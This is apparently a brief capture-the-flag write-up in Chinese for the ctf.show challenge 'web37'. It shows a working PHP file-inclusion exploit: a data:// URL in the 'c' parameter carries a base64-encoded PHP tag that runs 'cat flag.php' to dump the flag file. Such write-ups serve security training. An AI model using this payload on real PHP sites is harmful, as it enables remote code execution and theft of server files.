web37

使用data伪协议可以做到恶意代码执行,使用恶意代码执行输出flag.php

http://a8b56964-c5a9-4d28-9546-272540c0cffd.challenge.ctf.show/?c=data://text/plain;base64,PD89YGNhdCBmbGFnLnBocGA/Pg==